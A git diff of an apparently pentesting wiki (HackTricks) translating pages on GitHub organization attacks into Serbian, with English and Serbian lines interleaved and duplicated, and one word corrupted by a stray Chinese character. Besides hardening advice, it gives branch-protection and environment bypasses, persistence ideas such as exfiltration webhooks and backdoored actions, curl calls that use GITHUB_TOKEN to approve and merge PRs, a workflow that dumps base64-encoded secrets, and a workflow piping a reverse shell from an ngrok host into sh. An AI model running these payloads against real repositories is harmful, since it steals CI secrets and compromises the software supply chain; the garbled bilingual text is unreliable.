There are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations/<org_name>/settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs).
Postoje neke **podrazumevane privilegije** koje se mogu dodeliti **članovima** organizacije. Ove se mogu kontrolisati sa stranice `https://github.com/organizations/<org_name>/settings/member_privileges` ili iz [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs).
- **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**.
- **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories.
- **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages.
- **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it.
- _I couldn't find this info in the APIs response, share if you do_
- **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**.
- _I couldn't find this info in the APIs response, share if you do_
- **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.**
- _I couldn't find this info in the APIs response, share if you do_
- **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled.
- _I couldn't find this info in the APIs response, share if you do_
- **More things can be configured** in this page but the previous are the ones more security related.
- **Osnovne dozvole**: Članovi će imati dozvolu None/Read/write/Admin za repozitorijume organizacije. Preporučuje se **None** ili **Read**.
- **Forkovanje repozitorijuma**: Ako nije neophodno, bolje je **ne dozvoliti** članovima da fork-uju repozitorijume organizacije.
- **Kreiranje stranica**: Ako nije neophodno, bolje je **ne dozvoliti** članovima da objavljuju stranice iz repozitorijuma organizacije. Ako je neophodno, možete dozvoliti kreiranje javnih ili privatnih stranica.
- **Zahtevi za pristup integraciji**: Sa ovim omogućeno, spoljnim saradnicima će biti omogućeno da zatraže pristup za GitHub ili OAuth aplikacije da pristupe ovoj organizaciji i njenim resursima. Obično je potrebno, ali ako nije, bolje je onemogućiti to.
- _Nisam mogao pronaći ove informacije u API odgovoru, podelite ako ih pronađete_
- **Promena vidljivosti repozitorijuma**: Ako je omogućeno, **članovi** sa **admin** dozvolama za **repozitorijum** će moći da **promene njegovu vidljivost**. Ako je onemogućeno, samo vlasnici organizacije mogu menjati vidljivosti repozitorijuma. Ako ne želite da ljudi učine stvari **javnim**, uverite se da je ovo **onemogućeno**.
- _Nisam mogao pronaći ove informacije u API odgovoru, podelite ako ih pronađete_
- **Brisanje i prenos repozitorijuma**: Ako je omogućeno, članovi sa **admin** dozvolama za repozitorijum će moći da **obrišu** ili **prenose** javne i privatne **repozitorijume**.
- _Nisam mogao pronaći ove informacije u API odgovoru, podelite ako ih pronađete_
- **Dozvoliti članovima da kreiraju timove**: Ako je omogućeno, svaki **član** organizacije će moći da **kreira** nove **timove**. Ako je onemogućeno, samo vlasnici organizacije mogu kreirati nove timove. Bolje je da ovo bude onemogućeno.
- _Nisam mogao pronaći ove informacije u API odgovoru, podelite ako ih pronađete_
- **Još stvari se mogu konfigurisati** na ovoj stranici, ali prethodne su one koje su više vezane za bezbednost.
### Actions Settings
### Podešavanja akcija
Several security related settings can be configured for actions from the page `https://github.com/organizations/<org_name>/settings/actions`.
Nekoliko podešavanja vezanih za bezbednost može se konfigurisati za akcije sa stranice `https://github.com/organizations/<org_name>/settings/actions`.
> [!NOTE]
> Note that all this configurations can also be set on each repository independently
> Imajte na umu da se sve ove konfiguracije takođe mogu postaviti na svakom repozitorijumu nezavisno
- **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run.
- [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)
- **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators.
- _I couldn't find an API with this info, share if you do_
- **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository.
- _I couldn't find an API with this info, share if you do_
- **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB_TOKEN given to running workflows.
- [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)
- **Github akcije politike**: Omogućava vam da navedete koji repozitorijumi mogu pokretati radne tokove i koji radni tokovi bi trebali biti dozvoljeni. Preporučuje se da **specificirate koji repozitorijumi** bi trebali biti dozvoljeni i ne dozvoliti svim akcijama da se pokreću.
- [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)
- **Fork pull request radni tokovi od spoljnjih saradnika**: Preporučuje se da **zahtevate odobrenje za sve** spoljne saradnike.
- _Nisam mogao pronaći API sa ovim informacijama, podelite ako ih pronađete_
- **Pokretanje radnih tokova iz fork pull zahteva**: Veoma je **nepreporučljivo pokretati radne tokove iz pull zahteva** jer će održavaoci fork porekla dobiti mogućnost korišćenja tokena sa dozvolama za čitanje na izvorni repozitorijum.
- _Nisam mogao pronaći API sa ovim informacijama, podelite ako ih pronađete_
- **Dozvole radnog toka**: Veoma se preporučuje da **samo date dozvole za čitanje repozitorijuma**. Ne preporučuje se davanje dozvola za pisanje i kreiranje/odobravanje pull zahteva kako bi se izbegla zloupotreba GITHUB_TOKEN-a datog pokrenutim radnim tokovima.
- [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)
### Integrations
### Integracije
_Let me know if you know the API endpoint to access this info!_
_Javite mi ako znate API krajnju tačku za pristup ovim informacijama!_
- **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them).
- **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them).
- **Politika pristupa aplikacijama trećih strana**: Preporučuje se ograničiti pristup svakoj aplikaciji i dozvoliti samo potrebne (nakon pregleda).
- **Instalirane GitHub aplikacije**: Preporučuje se dozvoliti samo potrebne (nakon pregleda).
## Recon & Attacks abusing credentials
## Istraživanje i napadi zloupotrebom kredencijala
For this scenario we are going to suppose that you have obtained some access to a github account.
Za ovaj scenario pretpostavićemo da ste dobili neki pristup github nalogu.
### With User Credentials
### Sa korisničkim kredencijalima
If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.**
Ako nekako već imate kredencijale za korisnika unutar organizacije, možete **samo da se prijavite** i proverite koje **preduzetničke i organizacione uloge imate**, ako ste običan član, proverite koje **dozvole imaju obični članovi**, u kojim **grupama** ste, koje **dozvole imate** nad kojim **repozitorijumima** i **kako su repozitorijumi zaštićeni**.
Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.
Imajte na umu da se **2FA može koristiti** tako da ćete moći da pristupite ovim informacijama samo ako takođe možete **proći tu proveru**.
> [!NOTE]
> Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
> Imajte na umu da ako **uspete da ukradete `user_session` kolačić** (trenutno konfigurisano sa SameSite: Lax) možete **potpuno imitirati korisnika** bez potrebe za kredencijalima ili 2FA.
Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful.
Proverite odeljak u nastavku o [**zaobilaznicama zaštite grana**](./#branch-protection-bypass) u slučaju da je korisno.
### With User SSH Key
### Sa korisničkim SSH ključem
Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
With this key you can perform **changes in repositories where the user has some privileges**, however you can not sue it to access github api to enumerate the environment. However, you can get **enumerate local settings** to get information about the repos and user you have access to:
Github omogućava **korisnicima** da postave **SSH ključeve** koji će se koristiti kao **metoda autentifikacije za implementaciju koda** u njihovo ime (2FA se ne primenjuje).
Sa ovim ključem možete izvršiti **promene u repozitorijumima gde korisnik ima neke privilegije**, međutim ne možete ga koristiti za pristup github API-ju da enumerišete okruženje. Međutim, možete **enumerisati lokalne postavke** da dobijete informacije o repozitorijumima i korisniku kojem imate pristup:
```bash
# Go to the the repository folder
# Get repo config and current user name and email
git config --list
```
Ako je korisnik konfigurisao svoje korisničko ime kao svoje github korisničko ime, možete pristupiti **javnim ključevima koje je postavio** na svom nalogu na _https://github.com/\<github_username>.keys_, možete proveriti ovo da potvrdite da li se privatni ključ koji ste pronašli može koristiti.
If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\<github_username>.keys_, you could check this to confirm the private key you found can be used.
**SSH ključevi** se takođe mogu postaviti u repozitorijume kao **deploy ključevi**. Svako ko ima pristup ovom ključiću moći će da **pokrene projekte iz repozitorijuma**. Obično, na serveru sa različitim deploy ključevima, lokalna datoteka **`~/.ssh/config`** će vam dati informacije o tome kojem ključu se odnosi.
**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
#### GPG Ključevi
#### GPG Keys
As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.
Check locally if the current user has any key with:
Kao što je objašnjeno [**ovde**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md), ponekad je potrebno potpisati commit-e ili biste mogli biti otkriveni.
Proverite lokalno da li trenutni korisnik ima neki ključ sa:
```shell
gpg --list-secret-keys --keyid-format=long
```
### Sa korisničkim tokenom
### With User Token
Za uvod o [**korisničkim tokenima proverite osnovne informacije**](basic-github-information.md#personal-access-tokens).
For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens).
Korisnički token može biti korišćen **umesto lozinke** za Git preko HTTPS-a, ili može biti korišćen za [**autentifikaciju na API preko osnovne autentifikacije**](https://docs.github.com/v3/auth/#basic-authentication). U zavisnosti od privilegija koje su mu dodeljene, možda ćete moći da izvršite različite radnje.
A user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions.
Korisnički token izgleda ovako: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
### Sa Oauth aplikacijom
### With Oauth Application
Za uvod o [**Github Oauth aplikacijama proverite osnovne informacije**](basic-github-information.md#oauth-applications).
For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications).
Napadač može kreirati **malicious Oauth aplikaciju** da bi pristupio privilegovanim podacima/radnjama korisnika koji je prihvataju verovatno kao deo phishing kampanje.
An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
Ovo su [opsegovi koje Oauth aplikacija može zatražiti](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). Uvek treba proveriti tražene opsegove pre nego što ih prihvatite.
These are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A should always check the scopes requested before accepting them.
Pored toga, kao što je objašnjeno u osnovnim informacijama, **organizacije mogu dati/oduzeti pristup trećim aplikacijama** informacijama/repozitorijima/radnjama vezanim za organizaciju.
Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
### Sa Github aplikacijom
### With Github Application
Za uvod o [**Github aplikacijama proverite osnovne informacije**](basic-github-information.md#github-applications).
For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications).
Napadač može kreirati **malicious Github aplikaciju** da bi pristupio privilegovanim podacima/radnjama korisnika koji je prihvataju verovatno kao deo phishing kampanje.
An attacker might create a **malicious Github Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
Pored toga, kao što je objašnjeno u osnovnim informacijama, **organizacije mogu dati/oduzeti pristup trećim aplikacijama** informacijama/repozitorijima/radnjama vezanim za organizaciju.
Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
## Kompromitovanje i zloupotreba Github akcije
## Compromise & Abuse Github Action
There are several techniques to compromise and abuse a Github Action, check them here:
Postoji nekoliko tehnika za kompromitovanje i zloupotrebu Github akcije, proverite ih ovde:
{{#ref}}
abusing-github-actions/
{{#endref}}
## Branch Protection Bypass
## Obilaženje zaštite grane
- **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB_TOKEN** you might be able to **approve your PR** and get 1 approval this way.
- _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._
- **Dismiss approvals when new commits are pushed**: If this isnt set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch.
- **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**.
- When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.**
- **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections.
- **Include administrators**: If this isnt set and you are admin of the repo, you can bypass this branch protections.
- **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything.
- **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back.
- **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`).
- If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**.
- **Zahtevajte određeni broj odobrenja**: Ako ste kompromitovali nekoliko naloga, možete jednostavno prihvatiti svoje PR-ove iz drugih naloga. Ako imate samo nalog sa kojeg ste kreirali PR, ne možete prihvatiti svoj PR. Međutim, ako imate pristup **Github Action** okruženju unutar repozitorijuma, koristeći **GITHUB_TOKEN** možda ćete moći da **odobrite svoj PR** i dobijete 1 odobrenje na ovaj način.
- _Napomena za ovo i za ograničenje vlasnika koda da obično korisnik neće moći da odobri svoje PR-ove, ali ako možete, možete to zloupotrebiti da prihvatite svoje PR-ove._
- **Odbacite odobrenja kada su novi commit-ovi poslati**: Ako ovo nije postavljeno, možete poslati legitiman kod, čekati da ga neko odobri, a zatim staviti maliciozni kod i spojiti ga u zaštićenu granu.
- **Zahtevajte preglede od vlasnika koda**: Ako je ovo aktivirano i vi ste vlasnik koda, mogli biste napraviti **Github Action da kreira vaš PR i zatim ga odobrite sami**.
- Kada je **CODEOWNER datoteka pogrešno konfigurisana**, Github se ne žali, ali je ne koristi. Stoga, ako je pogrešno konfigurisana, **zaštita vlasnika koda nije primenjena.**
- **Dozvolite određenim akterima da zaobiđu zahteve za povlačenje**: Ako ste jedan od ovih aktera, možete zaobići zaštitu zahteva za povlačenje.
- **Uključite administratore**: Ako ovo nije postavljeno i vi ste administrator repozitorijuma, možete zaobići ovu zaštitu grane.
- **PR otmica**: Možda ćete moći da **modifikujete PR nekog drugog** dodajući maliciozni kod, odobravajući rezultantni PR sami i spajajući sve.
- **Uklanjanje zaštite grane**: Ako ste **administrator repozitorijuma, možete onemogućiti zaštite**, spojiti svoj PR i ponovo postaviti zaštite.
- **Obilaženje zaštita za slanje**: Ako repozitorijum **samo dozvoljava određenim korisnicima** da šalju push (spajaju kod) u granama (zaštita grane može štititi sve grane specificirajući wildcard `*`).
- Ako imate **pristup pisanju u repozitorijumu, ali vam nije dozvoljeno da šaljete kod** zbog zaštite grane, još uvek možete **napraviti novu granu** i unutar nje kreirati **github akciju koja se aktivira kada se kod pošalje**. Kako **zaštita grane neće štititi granu dok ne bude kreirana**, ovo prvo slanje koda u granu će **izvršiti github akciju**.
## Bypass Environments Protections
## Obilaženje zaštita okruženja
For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments).
Za uvod o [**Github okruženju proverite osnovne informacije**](basic-github-information.md#git-environments).
In case an environment can be **accessed from all the branches**, it's **isn't protected** and you can easily access the secrets inside the environment. Note that you might find repos where **all the branches are protected** (by specifying its names or by using `*`) in that scenario, **find a branch were you can push code** and you can **exfiltrate** the secrets creating a new github action (or modifying one).
Note, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**.
U slučaju da se okruženje može **pristupiti sa svih grana**, **nije zaštićeno** i možete lako pristupiti tajnama unutar okruženja. Imajte na umu da možete pronaći repozitorijume gde su **sve grane zaštićene** (specifikovanjem njihovih imena ili korišćenjem `*`), u tom scenariju, **pronađite granu u kojoj možete poslati kod** i možete **izvući** tajne kreirajući novu github akciju (ili modifikujući jednu).
Napomena, možete naići na ivicu slučaja gde su **sve grane zaštićene** (putem wildcard `*`) i specificirano je **ko može slati kod u grane** (_to možete specificirati u zaštiti grane_) i **vašem korisniku nije dozvoljeno**. I dalje možete pokrenuti prilagođenu github akciju jer možete kreirati granu i koristiti okidač za slanje preko nje same. **Zaštita grane dozvoljava slanje u novu granu, tako da će github akcija biti aktivirana**.
```yaml
push: # Run it when a push is made to a branch
branches:
- current_branch_name #Use '**' to run when a push is made to any branch
branches:
- current_branch_name #Use '**' to run when a push is made to any branch
```
Napomena da će se **nakon kreiranja** grane **zaštita grane primeniti na novu granu** i nećete moći da je izmenite, ali do tada ćete već izvući tajne.
Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets.
## Persistencija
## Persistence
- Generišite **korisnički token**
- Ukradite **github tokene** iz **tajni**
- **Brisanje** rezultata **workflow-a** i **grana**
- Dajte **više dozvola celoj organizaciji**
- Kreirajte **webhook-ove** za exfiltraciju informacija
- Pozovite **spoljašnje saradnike**
- **Uklonite** **webhook-ove** koje koristi **SIEM**
- Kreirajte/izmenite **Github Action** sa **bekdoor-om**
- Pronađite **ranjivu Github Action za injekciju komandi** putem **modifikacije** vrednosti **tajne**
- Generate **user token**
- Steal **github tokens** from **secrets**
- **Deletion** of workflow **results** and **branches**
- Give **more permissions to all the org**
- Create **webhooks** to exfiltrate information
- Invite **outside collaborators**
- **Remove** **webhooks** used by the **SIEM**
- Create/modify **Github Action** with a **backdoor**
- Find **vulnerable Github Action to command injection** via **secret** value modification
### Impostor Commit-ovi - Bekdoor putem repo commit-ova
### Imposter Commits - Backdoor via repo commits
In Github it's possible to **create a PR to a repo from a fork**. Even if the PR is **not accepted**, a **commit** id inside the orginal repo is going to be created for the fork version of the code. Therefore, an attacker **could pin to use an specific commit from an apparently ligit repo that wasn't created by the owner of the repo**.
Like [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e):
U Github-u je moguće **napraviti PR za repo iz forka**. Čak i ako PR **nije prihvaćen**, **commit** id unutar originalnog repoa će biti kreiran za fork verziju koda. Stoga, napadač **može da se oslanja na korišćenje specifičnog commit-a iz naizgled legitimnog repoa koji nije kreirao vlasnik repoa**.
Kao [**ovaj**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e):
```yaml
name: example
on: [push]
jobs:
commit:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e
- shell: bash
run: |
echo 'hello world!'
commit:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e
- shell: bash
run: |
echo 'hello world!'
```
For more info check [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd)
Za više informacija proverite [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd)
{{#include ../../banners/hacktricks-training.md}}

570
src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
View File

@@ -4,389 +4,371 @@
## Basic Information
In this page you will find:
Na ovoj stranici ćete pronaći:
- A **summary of all the impacts** of an attacker managing to access a Github Action
- Different ways to **get access to an action**:
- Having **permissions** to create the action
- Abusing **pull request** related triggers
- Abusing **other external access** techniques
- **Pivoting** from an already compromised repo
- Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts)
- **rezime svih uticaja** napadača koji uspe da pristupi Github Action
- Različite načine za **pristup akciji**:
- Imajući **dozvole** za kreiranje akcije
- Zloupotreba **okidača** povezanih sa pull request-om
- Zloupotreba **drugih tehnika spoljnog pristupa**
- **Pivotiranje** iz već kompromitovanog repozitorijuma
- Na kraju, odeljak o **tehnikama post-eksploatacije za zloupotrebu akcije iznutra** (uzrokovanje pomenutih uticaja)
## Impacts Summary
For an introduction about [**Github Actions check the basic information**](../basic-github-information.md#github-actions).
Za uvod o [**Github Actions proverite osnovne informacije**](../basic-github-information.md#github-actions).
If you can **execute arbitrary code in GitHub Actions** within a **repository**, you may be able to:
Ako možete **izvršiti proizvoljni kod u GitHub Actions** unutar **repozitorijuma**, možda ćete moći da:
- **Steal secrets** mounted to the pipeline and **abuse the pipeline's privileges** to gain unauthorized access to external platforms, such as AWS and GCP.
- **Compromise deployments** and other **artifacts**.
- If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack.
- **Execute code in custom workers** to abuse computing power and pivot to other systems.
- **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`.
- **Uk盗ite tajne** montirane na pipeline i **zloupotrebite privilegije pipeline-a** da dobijete neovlašćen pristup spoljnim platformama, kao što su AWS i GCP.
- **Komprimujete implementacije** i druge **artefakte**.
- Ako pipeline implementira ili skladišti resurse, mogli biste izmeniti konačni proizvod, omogućavajući napad na lanac snabdevanja.
- **Izvršite kod u prilagođenim radnicima** da zloupotrebite računske resurse i pivotirate na druge sisteme.
- **Prepišete kod repozitorijuma**, u zavisnosti od dozvola povezanih sa `GITHUB_TOKEN`.
## GITHUB_TOKEN
This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given when the admin enables this option:
Ova "**tajna**" (koja dolazi iz `${{ secrets.GITHUB_TOKEN }}` i `${{ github.token }}`) se daje kada administrator omogući ovu opciju:
<figure><img src="../../../images/image (86).png" alt=""><figcaption></figcaption></figure>
This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)
Ovaj token je isti koji će **Github aplikacija koristiti**, tako da može pristupiti istim krajnjim tačkama: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)
> [!WARNING]
> Github should release a [**flow**](https://github.com/github/roadmap/issues/74) that **allows cross-repository** access within GitHub, so a repo can access other internal repos using the `GITHUB_TOKEN`.
> Github bi trebao da objavi [**tok**](https://github.com/github/roadmap/issues/74) koji **omogućava međurepozitorijumski** pristup unutar GitHub-a, tako da repo može pristupiti drugim internim repozitorijumima koristeći `GITHUB_TOKEN`.
You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token)
Možete videti moguće **dozvole** ovog tokena na: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token)
Note that the token **expires after the job has completed**.\
These tokens looks like this: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7`
Napomena da token **isteče nakon što je posao završen**.\
Ovi tokeni izgledaju ovako: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7`
Some interesting things you can do with this token:
Neke zanimljive stvari koje možete uraditi sa ovim tokenom:
{{#tabs }}
{{#tab name="Merge PR" }}
```bash
# Merge PR
curl -X PUT \
https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/merge \
-H "Accept: application/vnd.github.v3+json" \
--header "authorization: Bearer $GITHUB_TOKEN" \
--header "content-type: application/json" \
-d "{\"commit_title\":\"commit_title\"}"
https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/merge \
-H "Accept: application/vnd.github.v3+json" \
--header "authorization: Bearer $GITHUB_TOKEN" \
--header "content-type: application/json" \
-d "{\"commit_title\":\"commit_title\"}"
```
{{#endtab }}
{{#tab name="Approve PR" }}
{{#tab name="Odobri PR" }}
```bash
# Approve a PR
curl -X POST \
https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/reviews \
-H "Accept: application/vnd.github.v3+json" \
--header "authorization: Bearer $GITHUB_TOKEN" \
--header 'content-type: application/json' \
-d '{"event":"APPROVE"}'
https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/reviews \
-H "Accept: application/vnd.github.v3+json" \
--header "authorization: Bearer $GITHUB_TOKEN" \
--header 'content-type: application/json' \
-d '{"event":"APPROVE"}'
```
{{#endtab }}
{{#tab name="Create PR" }}
{{#tab name="Kreiraj PR" }}
```bash
# Create a PR
curl -X POST \
-H "Accept: application/vnd.github.v3+json" \
--header "authorization: Bearer $GITHUB_TOKEN" \
--header 'content-type: application/json' \
https://api.github.com/repos/<org_name>/<repo_name>/pulls \
-d '{"head":"<branch_name>","base":"master", "title":"title"}'
-H "Accept: application/vnd.github.v3+json" \
--header "authorization: Bearer $GITHUB_TOKEN" \
--header 'content-type: application/json' \
https://api.github.com/repos/<org_name>/<repo_name>/pulls \
-d '{"head":"<branch_name>","base":"master", "title":"title"}'
```
{{#endtab }}
{{#endtabs }}
> [!CAUTION]
> Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization.
> Imajte na umu da ćete u nekoliko slučajeva moći da pronađete **github korisničke tokene unutar Github Actions envs ili u tajnama**. Ovi tokeni vam mogu dati više privilegija nad repozitorijumom i organizacijom.
<details>
<summary>List secrets in Github Action output</summary>
<summary>Lista tajni u Github Action izlazu</summary>
```yaml
name: list_env
on:
workflow_dispatch: # Launch manually
pull_request: #Run it when a PR is created to a branch
branches:
- "**"
push: # Run it when a push is made to a branch
branches:
- "**"
workflow_dispatch: # Launch manually
pull_request: #Run it when a PR is created to a branch
branches:
- "**"
push: # Run it when a push is made to a branch
branches:
- "**"
jobs:
List_env:
runs-on: ubuntu-latest
steps:
- name: List Env
# Need to base64 encode or github will change the secret value for "***"
run: sh -c 'env | grep "secret_" | base64 -w0'
env:
secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
List_env:
runs-on: ubuntu-latest
steps:
- name: List Env
# Need to base64 encode or github will change the secret value for "***"
run: sh -c 'env | grep "secret_" | base64 -w0'
env:
secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
</details>
<details>
<summary>Get reverse shell with secrets</summary>
<summary>Dobijanje reverzne ljuske sa tajnama</summary>
```yaml
name: revshell
on:
workflow_dispatch: # Launch manually
pull_request: #Run it when a PR is created to a branch
branches:
- "**"
push: # Run it when a push is made to a branch
branches:
- "**"
workflow_dispatch: # Launch manually
pull_request: #Run it when a PR is created to a branch
branches:
- "**"
push: # Run it when a push is made to a branch
branches:
- "**"
jobs:
create_pull_request:
runs-on: ubuntu-latest
steps:
- name: Get Rev Shell
run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
env:
secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
create_pull_request:
runs-on: ubuntu-latest
steps:
- name: Get Rev Shell
run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
env:
secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
</details>
It's possible to check the permissions given to a Github Token in other users repositories **checking the logs** of the actions:
Moguće je proveriti dozvole date Github Token-u u drugim korisničkim repozitorijumima **proverom logova** akcija:
<figure><img src="../../../images/image (286).png" alt="" width="269"><figcaption></figcaption></figure>
## Allowed Execution
## Dozvoljena Izvršenja
> [!NOTE]
> This would be the easiest way to compromise Github actions, as this case suppose that you have access to **create a new repo in the organization**, or have **write privileges over a repository**.
> Ovo bi bio najlakši način da se kompromituju Github akcije, jer ovaj slučaj podrazumeva da imate pristup **kreiranju novog repozitorijuma u organizaciji**, ili imate **privilegije pisanja nad repozitorijumom**.
>
> If you are in this scenario you can just check the [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action).
> Ako ste u ovom scenariju, možete samo proveriti [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action).
### Execution from Repo Creation
